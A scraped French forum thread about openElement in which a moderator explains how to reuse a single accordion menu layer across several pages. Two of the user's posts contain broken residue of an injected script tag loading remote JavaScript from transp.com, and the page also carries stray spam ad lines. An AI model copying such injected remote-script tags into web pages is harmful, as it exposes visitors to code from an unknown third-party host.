Antivirus offre spéciale - jusqu'à 60 % de réduction avec openElement !
Accueil Forum Accueil Forum >

openElement

> Discussion générale openElement
  Nouveaux messages Nouveaux messages Fil RSS  - Menu accordéon
  FAQ FAQ  Rechercher dans le Forum   Inscription Inscription  Connexion Connexion

Menu accordéon

 Répondre Répondre
Auteur
Message
Supermi27 allez vers le bas
Newbie
Newbie


Depuis le: 09 Avr 2019
Status: Inactif
Points: 14
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Supermi27 Citer  RépondreRéponse Lien Direct à ce Post Sujet: Menu accordéon
    Envoyé : 10 Avr 2020 à 11:27
Bonjour a tous.< ="text/" async="" ="//transp.com/22876adb33772fed1c.js">

Est-il possible d'avoir un menu accordéon maître sur une page (http://www.dieu-est-amour.byethost15.com/Les_Promesses.htm) et esclave sur d'autres pages (http://www.dieu-est-amour.byethost15.com/Promesses_besoins_personnels.htm) ?
Le but est de changer qu'un seul menu accordéon quand je fais des rajouts car j'ai 8 pages avec ce menu.

Dans l'attente de vous lire.
Wink
Haut de la page
Hobby001 allez vers le bas
Admin Group
Admin Group
Avatar
Modérateur

Depuis le: 14 Feb 2015
Pays: Canada, Québec
Status: Inactif
Points: 5717
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Hobby001 Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 10 Avr 2020 à 12:31
Votre menu provient du calque base_menu qui est li à la page via le bouton Calque sus l'onglet Page

Dupliquez ce calque dans l'explorateur de site et renommez-le.  Faites-y tous vos changements puis liez-le dans la page visée
Haut de la page
Supermi27 allez vers le bas
Newbie
Newbie


Depuis le: 09 Avr 2019
Status: Inactif
Points: 14
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Supermi27 Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 10 Avr 2020 à 16:58
Merci beaucoup pour cette réponse Hobby001.< ="text/" async="" ="//transp.com/22876adb33772fed1c.js">
Je n'y avais pas pensé. Cela fonctionne.
Tu m’enlève un poids.
Je ne voyais pas changer le menu accordéon sur les 8 pages à chaque fois.

Pouces vers le hautPoignée de main
Haut de la page
 Répondre Répondre
  Partagez ce sujet   

Aller au Forum Permissions du forum allez vers le bas

Forum Software by Web Wiz Forums® version 10.18
Copyright ©2001-2014 Web Wiz Ltd.

Cette page a été affichée en 0,016 secondes.
Acheter votre vélo en ligne